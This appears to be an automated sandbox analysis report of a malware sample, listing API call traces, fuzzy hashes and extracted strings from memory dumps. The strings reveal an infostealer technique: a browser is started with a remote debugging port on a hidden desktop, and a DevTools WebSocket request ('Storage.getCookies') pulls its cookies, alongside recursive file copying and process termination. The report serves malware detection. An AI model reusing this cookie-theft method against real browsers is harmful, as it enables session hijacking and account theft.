                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                          • String ID:
                          • API String ID: 1346933759-0
                          • Opcode ID: 23ef62f69a4163b6f7c84508d6def1bc4ddf5bc26bc95ce644776f1b0e709819
                          • Instruction ID: b522aee5cbad5718798c6cf14ce1ddfd473fcbd01112f2ee31da6024ad8f0c9d
                          • Opcode Fuzzy Hash: 23ef62f69a4163b6f7c84508d6def1bc4ddf5bc26bc95ce644776f1b0e709819
                          • Instruction Fuzzy Hash: A2C18D31A112169BCB22EF68DC99AEF77B8EF51704F450429F94ADBA51EF30DC058B90
                          APIs
                          • memset.MSVCRT ref: 003A9790
                          • lstrcat.KERNEL32(?,?), ref: 003A97A0
                          • lstrcat.KERNEL32(?,?), ref: 003A97B1
                          • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 003A97C3
                          • memset.MSVCRT ref: 003A97D7
                            • Part of subcall function 003C3E70: lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003C3EA5
                            • Part of subcall function 003C3E70: lstrcpy.KERNEL32(00000000,00F2E5C8), ref: 003C3ECF
                            • Part of subcall function 003C3E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,003A134E,?,0000001A), ref: 003C3ED9
                          • wsprintfA.USER32 ref: 003A9806
                          • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 003A9827
                          • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 003A9844
                            • Part of subcall function 003C46A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003C46B9
                            • Part of subcall function 003C46A0: Process32First.KERNEL32(00000000,00000128), ref: 003C46C9
                            • Part of subcall function 003C46A0: Process32Next.KERNEL32(00000000,00000128), ref: 003C46DB
                            • Part of subcall function 003C46A0: StrCmpCA.SHLWAPI(?,?), ref: 003C46ED
                            • Part of subcall function 003C46A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 003C4702
                            • Part of subcall function 003C46A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 003C4711
                            • Part of subcall function 003C46A0: CloseHandle.KERNEL32(00000000), ref: 003C4718
                            • Part of subcall function 003C46A0: Process32Next.KERNEL32(00000000,00000128), ref: 003C4726
                            • Part of subcall function 003C46A0: CloseHandle.KERNEL32(00000000), ref: 003C4731
                          • lstrcat.KERNEL32(00000000,?), ref: 003A9878
                          • lstrcat.KERNEL32(00000000,?), ref: 003A9889
                          • lstrcat.KERNEL32(00000000,003D4B60), ref: 003A989B
                          • memset.MSVCRT ref: 003A98AF
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 003A98D4
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A9903
                          • StrStrA.SHLWAPI(00000000,00F2EBD8), ref: 003A9919
                          • lstrcpyn.KERNEL32(005D93D0,00000000,00000000), ref: 003A9938
                          • lstrlen.KERNEL32(?), ref: 003A994B
                          • wsprintfA.USER32 ref: 003A995B
                          • lstrcpy.KERNEL32(?,00000000), ref: 003A9971
                          • Sleep.KERNEL32(00001388), ref: 003A99E7
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A1557
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A1579
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A159B
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A15FF
                            • Part of subcall function 003A92B0: strlen.MSVCRT ref: 003A92E1
                            • Part of subcall function 003A92B0: strlen.MSVCRT ref: 003A92FA
                            • Part of subcall function 003A92B0: strlen.MSVCRT ref: 003A9399
                            • Part of subcall function 003A92B0: strlen.MSVCRT ref: 003A93E6
                            • Part of subcall function 003C4740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 003C4759
                            • Part of subcall function 003C4740: Process32First.KERNEL32(00000000,00000128), ref: 003C4769
                            • Part of subcall function 003C4740: Process32Next.KERNEL32(00000000,00000128), ref: 003C477B
                            • Part of subcall function 003C4740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 003C479C
                            • Part of subcall function 003C4740: TerminateProcess.KERNEL32(00000000,00000000), ref: 003C47AB
                            • Part of subcall function 003C4740: CloseHandle.KERNEL32(00000000), ref: 003C47B2
                            • Part of subcall function 003C4740: Process32Next.KERNEL32(00000000,00000128), ref: 003C47C0
                            • Part of subcall function 003C4740: CloseHandle.KERNEL32(00000000), ref: 003C47CB
                          • CloseDesktop.USER32(?), ref: 003A9A1C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                          • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                          • API String ID: 958055206-1862457068
                          • Opcode ID: 8e2efb2bd83d41fdf0ac476dd03b4d0f1112fb97d44fb9a2277e481f6203807b
                          • Instruction ID: 9b3ccb6c98326a2dfd7ebedb1b7568fbd62d3a8e747c8998bb8277b6acdfdf3b
                          • Opcode Fuzzy Hash: 8e2efb2bd83d41fdf0ac476dd03b4d0f1112fb97d44fb9a2277e481f6203807b
                          • Instruction Fuzzy Hash: 1C916571A10218AFDB21EF64DC49FEE77B8EF54700F14459AF609AB291DF70AE448B90
                          APIs
                          • wsprintfA.USER32 ref: 003BE22C
                          • FindFirstFileA.KERNEL32(?,?), ref: 003BE243
                          • StrCmpCA.SHLWAPI(?,003D17A0), ref: 003BE263
                          • StrCmpCA.SHLWAPI(?,003D17A4), ref: 003BE27D
                          • wsprintfA.USER32 ref: 003BE2A2
                          • StrCmpCA.SHLWAPI(?,003CCFEC), ref: 003BE2B4
                          • wsprintfA.USER32 ref: 003BE2D1
                            • Part of subcall function 003BEDE0: lstrcpy.KERNEL32(00000000,?), ref: 003BEE12
                          • wsprintfA.USER32 ref: 003BE2F0
                          • PathMatchSpecA.SHLWAPI(?,?), ref: 003BE304
                          • lstrcat.KERNEL32(?,00F2F240), ref: 003BE335
                          • lstrcat.KERNEL32(?,003D1794), ref: 003BE347
                          • lstrcat.KERNEL32(?,?), ref: 003BE358
                          • lstrcat.KERNEL32(?,003D1794), ref: 003BE36A
                          • lstrcat.KERNEL32(?,?), ref: 003BE37E
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 003BE394
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BE3D2
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BE422
                          • DeleteFileA.KERNEL32(?), ref: 003BE45C
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A1557
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A1579
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A159B
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A15FF
                          • FindNextFileA.KERNEL32(00000000,?), ref: 003BE49B
                          • FindClose.KERNEL32(00000000), ref: 003BE4AA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                          • String ID: %s\%s$%s\*
                          • API String ID: 1375681507-2848263008
                          • Opcode ID: 1c0d477e30974edcc58014eae897d591a13d368bedb34076eb4f615b13eb19ef
                          • Instruction ID: 972f9b87c2a54da810a5fc0db88fba4e934d81f5c07da261faa2082bc4663f51
                          • Opcode Fuzzy Hash: 1c0d477e30974edcc58014eae897d591a13d368bedb34076eb4f615b13eb19ef
                          • Instruction Fuzzy Hash: 1F818172901219ABCB21EF64DC49AEF77B9FF54300F04499AB50A97151EF34AA48CF90
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A16E2
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A1719
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A176C
                          • lstrcat.KERNEL32(00000000), ref: 003A1776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A17A2
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A18F3
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A18FE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat
                          • String ID: \*.*
                          • API String ID: 2276651480-1173974218
                          • Opcode ID: c6d585700f86bb3c32671c7fe807ce4c40b36ed384b7b748772073364f3c08e1
                          • Instruction ID: 51207edce9366aa22841b902a3cd3fd13df36d7183b1a7cd4d2fad67d672ce61
                          • Opcode Fuzzy Hash: c6d585700f86bb3c32671c7fe807ce4c40b36ed384b7b748772073364f3c08e1
                          • Instruction Fuzzy Hash: AE819531A112169FCB23EFA8D889AAF77B9EF16700F051129F805EB661DB30DC15CB91
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 003BDD45
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003BDD4C
                          • wsprintfA.USER32 ref: 003BDD62
                          • FindFirstFileA.KERNEL32(?,?), ref: 003BDD79
                          • StrCmpCA.SHLWAPI(?,003D17A0), ref: 003BDD9C
                          • StrCmpCA.SHLWAPI(?,003D17A4), ref: 003BDDB6
                          • wsprintfA.USER32 ref: 003BDDD4
                          • DeleteFileA.KERNEL32(?), ref: 003BDE20
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 003BDDED
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A1557
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A1579
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A159B
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A15FF
                            • Part of subcall function 003BD980: memset.MSVCRT ref: 003BD9A1
                            • Part of subcall function 003BD980: memset.MSVCRT ref: 003BD9B3
                            • Part of subcall function 003BD980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003BD9DB
                            • Part of subcall function 003BD980: lstrcpy.KERNEL32(00000000,?), ref: 003BDA0E
                            • Part of subcall function 003BD980: lstrcat.KERNEL32(?,00000000), ref: 003BDA1C
                            • Part of subcall function 003BD980: lstrcat.KERNEL32(?,00F2EBF0), ref: 003BDA36
                            • Part of subcall function 003BD980: lstrcat.KERNEL32(?,?), ref: 003BDA4A
                            • Part of subcall function 003BD980: lstrcat.KERNEL32(?,00F2D690), ref: 003BDA5E
                            • Part of subcall function 003BD980: lstrcpy.KERNEL32(00000000,?), ref: 003BDA8E
                            • Part of subcall function 003BD980: GetFileAttributesA.KERNEL32(00000000), ref: 003BDA95
                          • FindNextFileA.KERNEL32(00000000,?), ref: 003BDE2E
                          • FindClose.KERNEL32(00000000), ref: 003BDE3D
                          • lstrcat.KERNEL32(?,00F2F240), ref: 003BDE66
                          • lstrcat.KERNEL32(?,00F2DAC0), ref: 003BDE7A
                          • lstrlen.KERNEL32(?), ref: 003BDE84
                          • lstrlen.KERNEL32(?), ref: 003BDE92
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BDED2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                          • String ID: %s\%s$%s\*
                          • API String ID: 4184593125-2848263008
                          • Opcode ID: 32813ba15dc26f37e9131c725087e792c6e0c64d93a95525b4250b2da3d816ae
                          • Instruction ID: 8397a81b00d7b48719f06909ceb9509ebfb2e35f83bd8ad6562efc9aebe40b2a
                          • Opcode Fuzzy Hash: 32813ba15dc26f37e9131c725087e792c6e0c64d93a95525b4250b2da3d816ae
                          • Instruction Fuzzy Hash: 38617171A11209ABCB25EF74DC89AEE77B9FF58300F0045AAF506D7251EF34AA58CB50
                          APIs
                          • wsprintfA.USER32 ref: 003BD54D
                          • FindFirstFileA.KERNEL32(?,?), ref: 003BD564
                          • StrCmpCA.SHLWAPI(?,003D17A0), ref: 003BD584
                          • StrCmpCA.SHLWAPI(?,003D17A4), ref: 003BD59E
                          • lstrcat.KERNEL32(?,00F2F240), ref: 003BD5E3
                          • lstrcat.KERNEL32(?,00F2F230), ref: 003BD5F7
                          • lstrcat.KERNEL32(?,?), ref: 003BD60B
                          • lstrcat.KERNEL32(?,?), ref: 003BD61C
                          • lstrcat.KERNEL32(?,003D1794), ref: 003BD62E
                          • lstrcat.KERNEL32(?,?), ref: 003BD642
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BD682
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BD6D2
                          • FindNextFileA.KERNEL32(00000000,?), ref: 003BD737
                          • FindClose.KERNEL32(00000000), ref: 003BD746
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 50252434-4073750446
                          • Opcode ID: 0b7fe05b967b6d81d6c052522cd252734f5918e8bffc3ae5f477823bee6b2c89
                          • Instruction ID: 55d8ca77bfc75879c623b331b3112f281e3692ed022d0c325b2e751e0c542edb
                          • Opcode Fuzzy Hash: 0b7fe05b967b6d81d6c052522cd252734f5918e8bffc3ae5f477823bee6b2c89
                          • Instruction Fuzzy Hash: B561A771911119ABCB25EF74DC89ADE77B8EF58304F0044AAE60997250EF34AA58CF90
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_
                          • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                          • API String ID: 909987262-758292691
                          • Opcode ID: dc94d71983ee43d7916b6138d35356b427c069c806a16c0f2c94b15fd2d3c056
                          • Instruction ID: 7dccc69e37114b70793002beb1da0c1ae91a983890a752024045cac863438541
                          • Opcode Fuzzy Hash: dc94d71983ee43d7916b6138d35356b427c069c806a16c0f2c94b15fd2d3c056
                          • Instruction Fuzzy Hash: 7FA25871D012699BDF21DFA8C890BEDBBB6EF48300F1485AAD509E7241DB716E85CF90
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B23D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B23F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B2402
                          • lstrlen.KERNEL32(\*.*), ref: 003B240D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B242A
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 003B2436
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B246A
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 003B2486
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: \*.*
                          • API String ID: 2567437900-1173974218
